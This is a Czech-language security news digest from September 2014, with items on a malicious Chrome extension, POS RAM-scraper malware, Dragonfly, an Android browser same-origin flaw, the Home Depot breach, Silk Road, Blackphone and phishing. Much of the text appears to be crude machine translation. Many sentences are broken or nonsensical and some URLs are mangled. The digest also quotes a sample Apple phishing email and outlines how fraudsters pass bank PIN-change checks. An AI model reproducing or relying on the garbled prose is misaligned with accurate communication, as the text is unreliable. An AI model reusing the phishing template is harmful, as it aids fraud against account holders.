Začátkem tohoto roku, Google dělal to tak, že rozšíření, které nejsou hostovány na Chrome Web Store nemohou být instalovány a používány uživateli svého populárního prohlížeče. Tento pohyb byl určen k ochraně uživatele a jeho účinnost je založena na předpokladu, že žádné zjevně nebo potenciálně škodlivé rozšíření podaří, aby se přijal a najít cestu do obchodu Google. Bohužel, tato metoda není stoprocentní. výzkumníci Trend Micro nedávno analyzovali Facebook podvod, který pozval uživatelům vidět video z několika opilých dívek. Ti, kteří klikli na tento odkaz byli instruováni, aby si stáhnout konkrétní Chrome rozšíření z Chrome Web Store, aby ji viděl. Po rozšíření byl stažen, oběti byly skutečně přesměrován na videa YouTube v pochybnost. Ale bez vědomí k nim rozšíření, které jste nainstalovali dovoleno podvodníci, abyste mohl psát statusy, komentáře a posílat zprávy na Facebook jejich jménem. "Náš výzkum ukazuje, že autor za tohoto konkrétního rozšíření najal virtuální privátní server (VPS), v Rusku, kde zaregistroval několik domén, "výzkumník poukázal. Z těchto oblastech byl jeden C & C, kdo, kde on nebo ona sbírá ukradené data z infikovaných uživatelů a ten, který byl použit pro registraci rozšíření v Chrome Store. "On má alespoň jeden další VPS, který hostí asi 30 různých domén prodeji hubnutí produkty, angličtiny doučování služby a práce-od-home nabídka, "oni sdílí . "On používá among.us jako on-line počítadla počtu jeho obětí a Dropbox pro pořádání podvodných stránek." Tento konkrétní rozšíření má protože been z obchodu, ale bohužel, to podvodník není jediný, kdo se dokázal dostat jeden dovnitř za to. Vědci našli několik, a říkají, že jsou snadno odhalit, pokud víte, co hledat. "Na první pohled se tato rozšíření objeví okamžitě podezřelé. Jsou nedávno zveřejnila, nemají žádný popis jejich předpokládané funkce, nebo mají duplicitní názvy . Někteří z nich dokonce mají stejné "autora", jako těch škodlivých, "poznamenal, že tím, že dodatečná analýza ukazuje, že obsahují obfuscated kód JavaScriptu. Uživatelům se doporučuje, aby vždy pečlivě přezkoumat informace, která jde s každým rozšířením, které chcete nainstalovat , a ne na to, pokud to vypadá podezřele.


Vše, co potřebujete vědět o POS malware
22.9.2014 Viry
S letošní dramatické uptick v narušení bezpečnosti osobních údajů cílení maloobchodníky a restaurací řetězce a, konkrétněji, údaje platební karty, kterou zpracovávají každý den, je to bezpečné říci, že pro tuto chvíli, počítačoví podvodníci pocit, že našli husu, která snáší zlatá vejce . Target , PF Chang je , Home Depot , a pravděpodobně řada menších maloobchodníků byly zasaženy hackery, kteří mohou nebo nemusí být součástí stejné skupiny, ale tato porušení všechny mají jedno společné: jsou útočníci použili PoS RAM škrábání malware shromažďovat data z karty, dokud je ještě v nezašifrované podobě. Vzestup POS RAM škrabky v podobě vidíme dnes zahájen koncem roku 2011, kdy Rdasrv malware se stala dobrou alternativou k dříve používané ladění nástrojů, které dumpingové stopy 1 a 2 kredity dat z karty z RAM. Teprve o rok později, tři nové a odlišné POS RAM škrabky na povrch. V roce 2014 byly zjištěny tolik jako šest nových škrabky: JackPOS, Decebel, Soraya, BrutPOS, odmlce , a nové a účinnější verze BlackPOS . Jejich hlavním cílem je sběr dat a exfiltrate ji na místo, kde útočníci mohou vyzvednout, a zvládneme to a podívejte se pod radarem společností tím, že zaměstná celou řadu technik a funkcí: více složek; sítí, bot a zabít funkce přepínačů; více průsaků techniky; šifrování. Skutečnost, že existují vývojové kity tam, že umožňuje komukoliv vytvořit vlastní binárky porušují systémy obětí je dalším faktorem úspěchu. Numaan Huq, vedoucí vědecký pracovník hrozba Trend Micro, nedávno dokončil rozsáhlou zprávu o POS RAM škrabky, ve kterém všiml si minulost, se ponořil do současnosti, a dělal odborný odhad o budoucnosti tohoto konkrétního typu malware. Tato zpráva by měla být musí-číst pro každého, kdo má za úkol chránit pokladní systémy, jak to také vysvětluje metody infekce často používá cyber podvodníci šířit tento typ malware, a poskytuje dobrý přehled o nových technologií a změn ve zpracování plateb ekosystému kreditních karet, stejně jako nové trendy v přístupu Cyber ​​podvodníci. V neposlední řadě Huq nabízí také řadu konkrétních tipů - hardware, software a politika založená -, která by měla výrazně snížit útoku a rizika každá společnost, která se zabývá platebními kartami zákazníků v současné době čelí.


Dragonfly malware cílení farmaceutických společností
22.9.2014 Viry
Nedávno odhalil Dragonfly (HAVEX) malware pravděpodobně zaměřuje na farmaceutický sektor, nikoli odvětví energetiky stejně jako předtím věřil, podle Belden.

Až do teď, pokročilé kybernetickými útoky proti průmyslu se zaměřením na kritické energetiky a chemických. Manažerské týmy Výroba se doporučuje, aby aktualizovali své hodnocení rizik, a zajistily, že jejich kybernetické bezpečnosti obrana vydrží to, co je jasně vysoce koordinované útoky týmy profesionálních hackerů. Během několika posledních let, průmyslová infrastruktura byla identifikována jako klíčový cíl pro hackery a vlády -sponsored válčení přitahuje některé z nejvíce sofistikovaných kybernetických útoků na záznamu, včetně Stuxnet, Flame a Duqu. Dragonfly je významná, protože je to první z vyspělých útoků od Stuxnet mít užitečné zatížení, které se zaměřují na specifické komponenty ICS. Vzhledem k významu tohoto zjištění, Belden pověřen Joel Langill z RedHat Cyber, přední nezávislý bezpečnostní expert ICS, výzkumu Dragonfly více hloubka. Cílem bylo pochopit kampaň Dragonfly s cílem poskytnout co nejlepší poradenství pro zákazníky, pro obranu proti pokročilé malware hrozby. Langill je přezkum Dragonfly zaměřena na provádění škodlivý kód na systémech, které odrážely skutečné konfigurace ICS a sledování dopadu malware. Tři hlavní faktory, které ho vedlo k domněnce, že cíl je duševním vlastnictvím farmaceutických organizací: 1. Z tisíce možných dodavatelů ICS, tři společnosti zaměřené na trojanized software nebyl primární dodavatelé "energie" zařízení. Místo toho, všechny tři nabízené produkty a služby nejčastěji používají ve farmaceutickém průmyslu. 2. Útok Dragonfly je velmi podobný charakter jako jiné kampaně s názvem Epic Turla a je pravděpodobné, řízen stejným týmem. Epic Turla bylo prokázáno, že byly zaměřeny na duševní vlastnictví farmaceutických společností. 3. Dragonfly malware obsahovala Industrial Protocol Scanner modul, který vyhledával zařízení na portech TCP 44818 (Omron, Rockwell Automation), 102 (Siemens) a 502 (Schneider Electric). Tyto protokoly a produkty mají vyšší instalovaný základnu v balení a výrobních aplikacích obvykle nacházejí v oblasti spotřební balené zboží odvětví, jako spíše než k farmaceutickému odvětví energetiky. "Můj výzkum, spojený s mou znalostí farmaceutického průmyslu, mě vedly k závěru, že to bylo cílem Dragonfly, "poznamenal Langill. "Potenciální škoda by mohla zahrnovat krádež proprietárních receptů a výrobní šarže sekvence kroků, jakož i informace o síti a zařízení, které označují výrobní objemy a schopnosti rostlin."


Webový prohlížeč v Androidu obsahuje závažnou chybu

22.9.2014 Zranitelnosti
Open-sourcový webový prohlížeč integrovaný do operačního systému Android obsahuje zranitelnost, která umožňuje nebezpečným webovým stránkám umisťovat javascriptový kód do jiných stránek.

Tento nebezpečný kód následně může číst cookie či hesla, posílat formuláře, zachycovat stisknutí kláves uživatelem a provádět spoustu dalších úkonů.

Webové prohlížeče jsou obecně nevrženy tak, aby zamezovaly skriptu z jedné stránky přistupovat k obsahu na druhé stránce. K zaručení této ochrany je použit princip SOP (Same Origin Policy): skripty mohou pouze číst či upravovat prvky webových stránek, jež přicházejí ze stejného zdroje jako samotný skript. Zdroj je pak identifikován pomocí protokolu, domény a čísla portu. SOP by měl zabraňovat tomu, aby například skript z http://červ.cz/ mohl přistupovat například k obsahu na http://computerworld.cz/.

Chyba v androidovém prohlížeči však umožňuje prolomení SOP. Jak zjistil Rafay Baloch, pokud je javascriptový kód vytvořen určitým způsobem, může zcela ignorovat SOP a bez jakýchkoli dalších omezení zasahovat do obsahu jiných webových stránek. To prakticky znamená, že jakákoli webová stránka navštívená v prohlížeči může krást citlivá data. Z uvedeného je zřejmé, že jde o kritickou zranitelnost, kterou je třeba opravit, a to rychle.

Google ve snaze získat nad Androidem větší kontrolu, svůj prohlížeč AOSP z Androidu částečně odstranil u verze 4.2 a u verze 4.4 jej zcela nahradil prohlížečem Chrome. Stejně tak, jako se nevypařily po oficiálním ukončení podpory z internetu Windows XP, však nezmizela ani aplikace open-sourcového androidového prohlížeče. Androidový prohlížeč v současné době v reálu používá více lidí než Chrome, jelikož jen málo uživatelů má nejnovější verzi Androidu a ještě méně si nainstaluje Chrome a používá ho.

Androidový prohlížeč je také zakomponován do produktů třetích stran a někteří uživatelé si jej dokonce nainstalovali na Android 4.4, jelikož jej preferují oproti Chromu. Baloch problém nahlásil Googlu, avšak společnost mu odpověděla, že se jejím technikům nepovedlo problém reprodukovat, a celou věc uzavřel. Baloch tedy celý případ popsal na blogu a vyvinul framework, který díru umožňuje testovat. Google následně oznámil, že se mu již problém podařilo zjistit a pracuje na záplatě.

Jak však záplata bude distribuována, není jasné. Chrome je aktualizován přes Play Store a starý androidový prohlížeč byl opravován jen v rámci aktualizací celého operačního systému. Ty však nejsou zdaleka tak časté. Bezpečnostní experti proto v mezidobí doporučují, aby uživatelé starších verzích Androidu přešli na Chrome, Firefox nebo Operu.


Samsung uvolnil bezplatnou aplikaci My Knox

22.9.2014 Zabezpečení
Zaměstnanci i firemní zákazníci dostanou na výběr hned z několika variant bezpečnostního řešení Knox, které bylo původně určeno výhradně pro podniky.

My Knox si mohou do svých telefonů Galaxy S5 nebo Galaxy Note 4 nainstalovat sami uživatelé bez nutnosti spolupráce s firemním oddělením IT.

Jak uvádí Samsung, pomocí aplikace mohou uživatelé jednoduše synchronizovat své emaily, kontakty a kalendář mezi desktopem a mobilními přístroji. Nástroj v mobilním zařízení vytvoří virtuální oddíl s vlastní obrazovkou, aplikacemi i widgety.

„Pokud hledáte bezplatné bezpečnostní řešení, které ochrání vaše soukromí a přitom vytvoří jednoduché bezpečné pracovní prostředí pro vaše emaily a aplikace, My Knox je to pravé pro vás,“ píše Samsung na blogu.

V jiném blogovém příspěvku zase Samsung zveřejnil detaily nových služeb Knox Premium a Knox Express určených pro správce IT k zajištění multiplatformní mobilní bezpečnosti. Služba Knox Premium, která je určena pro velké organizace, bude stát 1 dolar za jednoho uživatele. Knox Express, který je naopak určen pro střední a malé podniky, bude zcela zdarma.

Podpora cloudu pro nástroje Knox nyní firmy vyjde na 3,6 dolaru za jednoho uživatele. Jae Shin, viceprezident Knox Business Group, ale nedávno slíbil, že ceny půjdou dolů.

Samsung popsal Knox Premium jako komplexní řešení pro správu mobilních zařízení. Jeho součástí je mimo jiné v cloudu běžící Knox Enterprise Mobility Management (EMM) a samozřejmě i telefonní a online podpora. Služba kromě Androidu funguje i na dalších platformách, ovšem Samsung už nenapsal na jakých.

EMM je součástí i služby Knox Express. Správci IT dostanou k dispozici online portál s podporou zařízení se systémem Android nebo iOS.


Strange ICMP vidět v destinaci
21.9.2014 Rizika

Reader Ronnie nám poskytli dnes zachytávání paketů s velmi zajímavou situaci:

Některé pakety přicházejí, všechny ICMP echo request od nespřízněných adresu:

Zdroje ICMP
Zdroje ICMP
Všechny pakety ICMP odesílány na cílovou adresu nemá údaje, takže paket s 20 bajtů pro záhlaví IP a 8 bajtů pro echo request ICMP bez údajů

ICMP údaje
ICMP údaje
Vše nesouvisející adresa poslal 6 paketů: jednu s normálním TTL a 5 s kumulativní TTL:

6 ICMP pakety pro každé místo určení
6 ICMP pakety pro každé místo určení
Zdá se, že tyto pakety se snaží zmapovat cestu, ale ve velmi zvláštním způsobem. Vzhledem k tomu, existuje mnoho nesouvisí IP adresy se snaží udělat to samé, možná něco, co se snaží zmapovat trasy konkrétní adresu, aby něco není dobře. Cílová IP adresa klienta ADSL.


PHP Opravuje několik chyb ve verzi 5.4 a 5.5
20.9.2014 Zranitelnosti
PHP oznámil vydána verze 5.5.17 a 05.4.33. Deset chyby byly opraveny ve verzi 5.4.33 a 15 chyby byly opraveny ve verzi 5.5.17. Všichni uživatelé PHP se doporučuje upgrade.The nejnovější verzi jsou k dispozici ke stažení zde .

[1]-http://php.net/ChangeLog 5.php#5.4.33
[2] http://php.net/ChangeLog-5.php#5.5.17
[3] http: //windows.php NET / download


DARPA je po chyb v algoritmech implementována v softwaru
20.9.2014 Zranitelnosti
Defense Advanced Projects agentura pro výzkum (DARPA), hledá nové techniky analýzy programu a nástrojů, které umožňují analytikům určit slabiny algoritmů implementovaných v softwaru používaného americkou vládou, vojenské a ekonomické subjekty, a oznámila, že bude přijímat návrhy výzkumných na toto téma do 28 října. prostoru / času Analýza Cybersecurity (STAC), program je především zaměřena na odhalení slabých míst v souvislosti s prostorem a časem zdrojů chováním použití algoritmů, stejně jako zranitelná místa vyplývající z algoritmické složitosti a těch využitelné pro boční útoky kanálu. "jako nové obranných technologií, aby staré třídy zranitelnosti obtížné úspěšně využít, protivníci přestěhovat do nových tříd zranitelnosti," agentura uvedl v oznámení. "Chyby na základě vadných implementací algoritmů byly populární cíle pro mnoho let. Avšak poté, co nové obranné technologie, aby zranitelnosti na základě chybných implementací méně běžných i ztížených využívat, protivníci se obrátit svou pozornost na slabá místa vyplývajících samotných algoritmů." Agentura je nastaven na hledání těch zranitelností jako první. "Vývoj nových metod analýzy program najít algoritmické využití prostředků zranitelnosti nebude snadné," uvedly. "Analýza bude pravděpodobně muset najít cesty vedoucí z nepřátelských řízených vstupů na opakování struktur, které by mohly spotřebovat ochromující množství prostor a čas, a cesty vedoucí z tajemství výstupů, jejichž prostor nebo doba používání potenciálně může dojít k úniku informací. Analýzy také budou muset předvídat hranice na místo a doba používání dostatečně přesně rozlišovat mezi případy, kdy je to možné odepření služby nebo netěsnosti a případy, kdy tomu tak není. " Oni předpovídají, že "dokonalý" automatizovaný nástroj, který může poskytnout odpovědi na netriviálních otázek o chování programu . bude možné rozvíjet, ale věřte, že kombinované návěsy automatizované analýzy může být užitečné, "Program STAC snaží zálohy podél dvou hlavních výkonnostních os: rozsah a rychlost," vysvětlili. "Scale odkazuje na potřebu analýz, které jsou schopny s ohledem na větší kusy softwaru, od těch, které implementovat síťové služby se obvykle pohybuje v rozmezí stovek tisíc řádků zdrojového kódu, aby i větší systémy zahrnující miliony či desítky milionů řádků kód. Speed ​​se vztahuje k potřebě zvýšit rychlost, při které může lidská analytici analyzovat software pomocí automatizovaných nástrojů, z tisíců řádků kódu za hodinu až desetitisíce, statisíce nebo miliony řádků kódu za hodinu . " Pro více informací o programu, podívejte se na oznámení neusilovat , a velmi podrobný oznámení .


Home Depot porušení potvrdil, odcizení info použít pro změnu PIN, sbírat peníze
20.9.2014 Incidenty
V stručným prohlášením , a nechutně opakované dotazy , Home Depot potvrdila, že utrpěl porušení svých systémů datových platby. Porušení může ovlivnit každého zákazníka, který má od útočníka dubna používal jejich platební kartu společnosti USA a Kanadské obchody. Zákazníci, kteří nakupovali on-line na HomeDepot.com a ti, kteří nakupovali v mexických obchodech společnosti pravděpodobně nebudou ovlivněny. Po ujištění zákazníkům, že jejich kontrola informací a PIN vázána na jejich debetních karet nebyly ohroženy porušením, společnost má, nicméně, vyzval uživatele, aby přezkoumaly své výpisy z účtu za podezřelých transakcích. Nakonec, oni se o to si uvědomit, že potenciálně dotčených zákazníků nebude zodpovědný za jakékoliv podvodné poplatky na svých účtech, a oni budou nabízeny zdarma Identity Protection a sledování úvěrových služeb. Žádné další podrobnosti o porušení samo o sobě dostali, tak to je ještě nepotvrzená, zda útočníci použili variantu BlackPOS (nebo Kaptoxa) malware pro sběr dat z platebních karet, jako anonymní zdroje hlášeny. Malware v pochybnost byl použit v Target porušení , a novější varianta byl spatřen se maskuje jako AV služeb. Ale fakt, že útočníci nedokázali dostat své ruce na PIN debetní karty znamená málo, jako počet banky potvrdily, že karty klonované pomocí ukradených údajů jsou používány po celém světě vybrat peníze z bankomatu. Jak je to možné? "data karty ukradené od zákazníků Home Depot a nyní k prodeji na prodejně činu Rescator [dot] cc zahrnuje jak informace potřebné pro výrobu padělané karty, stejně jako celé jméno legitimní držitele karty a město, stát, a ZIP úložiště Home Depot, ze kterého byla karta ukradený, " vysvětluje Brian Krebs. "PSČ údaje z obchodu je důležité, protože umožňuje, aby protivníci rychle a přesněji lokalizovat číslo a datum narození držitele karty za použití trestní služby v podzemí sociálního zabezpečení, které prodávají tyto informace." Zločinci používají vše Informace o trik automatické volání-in systém bank změnit PIN ke kartě. Tyto typy systémů zjistit totožnost volajícího kontrolou, zda telefonní číslo, ze kterého byl hovor, je stejný, kdo mají o souboru a uživatelé požadavek zadejte 3-místné ověřovací karta hodnoty karty, datum její platnosti, datum zákazníka narození a poslední čtyři číslice čísla sociálního zabezpečení zákazníka. Bohužel, změny mohou být provedeny, i kdyby tři z těchto pěti typy informací jsou k dispozici a jsou správné, a podvodníci mohou poskytnout jim. Některé banky začaly žádá všechny tyto bezpečnostní kontroly, které mají být vymazány před povolováním jakékoli změny na účtech, které mají být provedeny, ale.

 

 

Účet FBI lokalizace serveru Hedvábná stezka je sporný výzkumníky
20.9.2014 Kriminalita
Americká vláda je vysvětlení toho, jak se jí podařilo objevit umístění serverů hosting Silk Road, nechvalně známý on-line černý trh, je sporný řadou bezpečnostních výzkumníků. Nik Cubrilovic říká, že vysvětlení není pravdivá. Pro jednoho, obrázek CAPTCHA Silk Road byl umístěn na stejném serveru a ve stejné skryté adresy URL jako webové stránky Silk Road, tvrdí, a to zejména skutečnost, vytvořil problémy na Hedvábné stezce v minulosti. "Vzhledem k tomu, generování CAPTCHA je intenzivní zdroj , tam byl útok DoS proti Hedvábné stezky, která neudělala nic víc, než neustále žádat CAPTCHA obrázky. místo bylo později upravené pro použití mezipaměti verze CAPTCHA obrázků, ale i ty byly podávány ze stejného hostitele a cibulí jako webové aplikace, " mu vysvětlil , a říká, že má důkazy o tom, aby to dokázal, když "Strávil hodně času zkoumání a testování bezpečnosti Silk Road (pro sport), a stal se obeznámený s jak svou architekturou a provoz po celou dobu, že první místo bylo nahoru. " Tato skutečnost byla potvrzena ochrany osobních údajů výzkumník a Tor vývojář Runa Sandvik, který také držel oko na Hedvábné stezce v průběhu let. Zadruhé, agenti nemohli objevili IP adresu serveru jen o pohledu na balíček zachycuje vyrábí sniffer, jak tvrdili. "Pokud pozorujeme skryté místo na Tor, to znamená, že jste směrování všechny vaše dopravy v této relaci přes síť Tor (pomocí místní SOCKS nebo HTTP proxy server). Dokonce i v hypotetickém případě, kdy - z nějakého důvodu nereálného - skryté stránky Silk Road byla včetně obrazu na externím serveru odkazem jeho IP adresu nebo jméno, agenti by stále sledovat přenosy, jako by přišel z Tor, "vysvětlil. "Neexistuje žádný kouzelný způsob, jak provoz z reálného vložené do HTML skryté služby IP by se najít cestu přímo ke klientovi, aniž by procházely přes síť Tor a přes Tor uzlů. Kdyby tomu tak je, bude to obrovská chyba v Tor, neboť by umožnilo administrátorovi skrytá místa odhalit návštěvníky včetně prvek, který se podává přímo klientovi přes Clearnet. " "mnohem více pravděpodobné vysvětlení je to, že FBI objevili zabezpečení zneužít nebo úniku informací v přihlašovací stránce, stejným způsobem celá řada dalších lidí, zjistili obdobnou bezpečnostní díry nebo únikům informací jak v přihlašovací stránce aplikace Silk Road sám, "on navrhne." Je Historie uživatelů podávání těchto bezpečnostních exploitů a únikům informací v Hedvábné stezce na různých fórech. " Ale proč agent lež, se ptáš? "V tomto případě, popis paketů štěnicemi a" kontrolu každý paket "vše je rozptýlení od co FBI opravdu. Technicky vzato, řekl, že paket sniffer odhalil skutečnou IP adresu serveru, je pravda - to, co není uvedeno, je paket sniffer byl vyzvednout odpovědi od požadavku na přihlašovací stránku, která byla ho nutí vyplivnout IP adresu jako součást chyby, "říká. "FBI má dobrý důvod nezmínil nějaké chyby, nebo nutit server dělat cokoliv, a předstírat, že se prostě zvedl IP adresu z drátu, protože takové opatření mohlo vyvolat obavy o tom, jak zákonné jejich akce v odhalení IP adresy byly. "


Blackphone bezpečnostní problémy a slabá místa představené
20.9.2014 Mobil
Blackphone, letadly a dodavatele nezávislé na smartphone, který byl vytvořen s cílem uvedení soukromí a kontrolu přímo do rukou jeho uživatelů není bez chyb, tým Bluebox Security objevil, když si jej.Tým analyzoval zařízení s operačním systémem verze 1.0.2 z PrivatOS, který je postaven na Android, a je dodáván s předinstalovaným balíkem aplikací, ochrany osobních údajů, umožnil, jako je Silent Circle Silent Phone, Silent Text a Silent Kontakty pro bezpečné volání, textové zpráv a ukládání kontaktů a aplikace Security Center, která umožňuje uživatelům ovládat app oprávnění. Všechny tyto aplikace byly postaveny společnostmi stojí za Blackphone (Silent Circle a Geeksphone). Telefon má i některé aplikace třetích stran nainstalovali, jako je Disconnect Secure Wireless, který vytvoří připojení VPN z přístroje do Disconnect.me (Blackphone . Partnerské servery), a speciální, Blackphone verze on-line nástroj pro zálohování SpiderOak tým objevil řadu problémů přímo s daným zařízením a aplikací na něm. Za prvé, v současné době neexistuje způsob, jak aktualizovat aplikace individuálně - to je problém, který bude vyřešen v listopadu. Za druhé, je nedostatek kritických aplikací - například aplikace, která umožní uživateli otevřít soubor PDF nebo dokument aplikace Word. To bude nutit uživatele k instalaci aplikací třetích stran pomocí sideloading nebo jiné nedůvěryhodné způsoby, jak telefon nenabízí k App Store, ze kterého ke stažení může být důvěryhodný. překvapením objev byl, že některé aplikace odiv na poskytování informací zranitelná. "Konkrétně jsme zjistili, že když se přihlásíte do backend služeb pro klíčové aplikace (Silent Circle aplikací, Secure Wireless a SpiderOak) v telefonu, aplikace netěsní uživatelské jméno a heslo k jakékoliv serveru SSL. Pozorovali jsme to zřízením MITM útok na síť na zařízení a instalaci vlastní SSL kořenový certifikát, "vědci sdílet na svém blogu. "Tento typ MITM útoku lze zmírnit zavedením SSL připne do aplikací," poukázal na to, že s tím, že ostatní aplikace mohou . být také únik informací . Tým také najít 150 + předinstalované kořenové certifikáty do úložiště systému pověření problematické "To znamená, že přístroj je věřit významný počet certifikačních autorit - z nichž některé nemusí cítit pohodlně o," že již bylo uvedeno, ukázal jako příklad jednoho konkrétního certifikátu jmenován "Root Certificate vláda." Mohou být zakázána, ale je to zdlouhavý úkol, který je třeba udělat ručně. Naštěstí tvůrci Blackphone byly otevřené pro prořezávání tohoto seznamu, a mají spolupracovat s výzkumníky Bluebox na to a změna se očekává, že v budoucích aktualizací. Blackphone vývojáři již stanoveny zranitelností nalezených v SilentCircle aplikací tím, že vytlačí PrivatOS 1.0.3 pouhá jedenáct dnů poté, co byli informováni o ně. Není to poprvé, co se tato soukromí smýšlející telefon byl testován. Minulý měsíc na DEF CON, Jon Sawyer, ředitel společnosti Applied Cybersecurity objevil několik chyb, některé na původní verzi firmware přístroje, které byly záplatované do té doby, v rekordním čase. Jak již bylo uvedeno dříve, navzdory tomu, co uživatelé mohou být očekával, Blackphone vývojáři věděli, že vědci nakonec najít slabá místa v zařízení a software na něm. . Oni byli vlastně doufali, že chyba lovci by otestujte zařízení a sdílet své poznatky Konečným cílem developera je vytlačit patche nalezených zranitelností rychleji než jakýkoli jiný výrobce OEM - opravit problémy, jakmile se nebo ostatní lidé najít.


ISACA spouští COBIT 5 on-line
20.9.2014 Nástroje
ISACA spustila online verze COBIT 5 , informační centrum pro zlepšení řízení a správu podnikové IT. Nová on-line platforma pomáhá zvyšovat užitečnost COBIT 5 rámce, obchodní rámec, který pomáhá spravovat informace a rizika technologie, a COBIT skupinu výrobků.

Jak kybernetické incidenty a narušení bezpečnosti osobních údajů ve velkém měřítku i nadále eskalovat do počtu a dopadu, odhalují zásadní nedostatky v oblasti řízení IT v organizacích všech velikostí. Nedávná ISACA průzkum 1245 odborníků z 50 zemí, kteří stáhli COBIT 5 rámce vyplývá, že v tvář obchodní a technologické prostředí jejich podniky čelí během posledních 12 měsíců, v blízkosti 8 z 10 lidí (78 procent) uvedla, s efektivní správy IT na místě se stala cennější. "High-profil kybernetické hrozby podtrhly rizika a zranitelných míst v podnicích po celém světě, "řekl Robert E Stroud, CGEIT, CRISC, mezinárodní prezident ISACA. "Making COBIT 5 k dispozici v on-line, přizpůsobitelné formát rozšiřuje schopnost podniků na ochranu jejich informačních aktiv a zlepšit výkonnost podniku." Více než 70 procent respondentů průzkumu uvedla, že COBIT 5 jim pomohlo řešit praktické obchodní záležitosti. Když žádal, aby pořadí první čtyři způsoby, COBIT 5 těžila jejich organizace, se uvedené:

Lepší integrace obchodních a IT (73 procent)
Lepší řízení rizik (60 procent)
Lepší schopnost identifikovat mezery (49 procent)
Větší viditelnost s představenstvem (45 procent).
Nová on-line verze COBIT 5 umožňuje uživatelům přizpůsobit odpovědné, odpovědnou, který byl konzultován, informoval (raci), plánovač a cíle kaskáda nástroj pro své podnikání, nebo klienty. cílů a plánovač RACI usnadňuje použití COBIT předních uživatele přes výběr podniku, IT-související a Enabler cíle vycházející z potřeb zúčastněných stran. Plánovač RACI chart podporuje vybrané postupy správy a řízení.


Apple s Googlem budou šifrovat všechna data uživatelů

20.9.2014 Kryptografie
Další verze mobilního operačního systému od Googlu – Android L – bude šifrovat uživatelská data již ve výchozím nastavení.

Stejně v nové verzi svého operačního systému postupuje i Apple. Data v iOS 8 jsou prý automaticky šifrována takovým způsobem, že se k nim nedostane ani sama společnost.

Uživatelé si tak mohou být opět o něco jistější při používání mobilních zařízení. Pro kyberzločince i vládní organizace zase bude získání cizích dat o něco pracnější. Jak Google, tak i Apple přitom šifrování osobních dat umožňují již nějakou dobu, ovšem mnozí uživatelé si buď této možnosti nejsou vědomi, nebo mají tuto funkci vypnutou.

Automatické šifrování v iOS 8 oznámil počátkem tohoto týdne samotný Tim Cook. Nezapomněl si přitom rýpnout právě do Googlu, když napsal, že Apple by nikdy nezneužil uživatelská data k tomu, aby jim mohl něco prodat. „Nijak neprofitujeme z dat, která ukládáte ve svých iPhonech nebo v iCloudu. Stejně tak ani nečteme vaše emaily,“ napsal Cook.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Apple má sice vlastní reklamní technologii iAd, ovšem podle Cooka mohou uživatelé tuto funkci vypnout.

Google přišel se svým oznámením krátce po Applu. Kromě nové funkcionality mluvčí společnosti upozornil také na to, že uživatelé mají šifrování k dispozici již tři roky.

Žádná ze společností na druhou stranu nepřichází s ničím převratným. Výchozí šifrování dlouhou dobu nabízí dnes již poněkud skomírající BlackBerry.


Web Scan hledá /info/whitelist.pac
19.9.2014 Počítačový útok
Nathan dnes oznámila, že byl vidět nový trend webového skenování na jeho webových serverů, kteří hledají /info/whitelist.pac. Skenování, kterou pozoroval je přes SSL. On byl pozoroval tuto činnost od 22.srpna

[22 / srpen / 2014: 18: 55: 32 -0500] xx.12.93.178 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[...]
[14 / září / 2014: 11: 10: 05 -0500] xx.216.137.7 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[14 / září / 2014: 13: 16:19 -0500] xx.174.190.254 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[14 / září / 2014: 14: 03: 48 -0500] xx .252.188.49 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[14 / září / 2014: 17: 10: 40 -0500] xx.17.199.47 GET / info /whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[14 / září / 2014: 21: 10: 26 -0500] xx.13.136.13 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[16 / září / 2014: 06: 30: 15 -0500] xx.10.51.74 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0, Windows NT 5.1)
[16 / září / 2014: 14: 03: 54 -0500] xx.240.174.203 GET /info/whitelist.pac HTTP / 1.1 Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Je ještě někdo viděl podobnou činnost proti jejich webových serverů?


Apple Phishing e-maily
19.9.2014 Phishing
S dnes je "koupit Apple telefon" den by nemělo být překvapením, že již existují některé phishingové e-maily jdou kolem, aby se pokusila využít publicity.

Jan poslal dnes ráno (díky):

-------------
Vážený zákazníku,

jsme Vás informovali, že Váš účet je asi skončí v kratší 48 hodin, je nutné aktualizovat informace s našimi auditu formy, jinak vaše relace a / nebo účet bude je omezený přístup.

stačí kliknout na níže uvedený odkaz a postupujte podle pokynů našeho poptávkového formuláře

Aktualizovat nyní ...

Toto je automaticky generovaná zpráva. Děkujeme, že jste se odpovědět. Pokud potřebujete pomoc, navštivte prosím Podpora pro Apple.

Apple Client Support.
-------------
Variace na mnoha phishingových e-mailů, vidíme pravidelně, jen s využitím dvou veřejných akcích, celebrity fotografie a vydání nového telefonu.

Možná, že připomínka zaměstnancům, stejně jako přátelé a rodina ignorovat e-maily, které říkají "klikněte zde"

Šťastný koupi telefonu den, nebo není-li phonically nakloněn, šťastný mluvit jako pirát den, nebo prostě vychutnat si pátek.


Váš on-line ověřením je nyní veřejná!
19.9.2014 Spam
E-mail s názvem "Vaše online ověřením je nyní veřejnost" by mohl být napůl děsivý, pokud byla odeslána na skutečné osoby. Ale jestli je to banda honeypot e-mailových adres, které nikdo spojený s nimi v reálném životě, a oni si půl tuctu těchto e-mailů týdně, pak to může být jen spam, podvod, nebo - s největší pravděpodobností - obojí.

Poté, co tolerovat a binning tyto hlučné e-maily na několik týdnů, nakonec jsme se rozhodli, aby se pohled vidět, co je za nimi. Ukázalo se, že všechny vedou k "instantcheckmate-dot-com", který se prodával "pozadí detektivní služby".

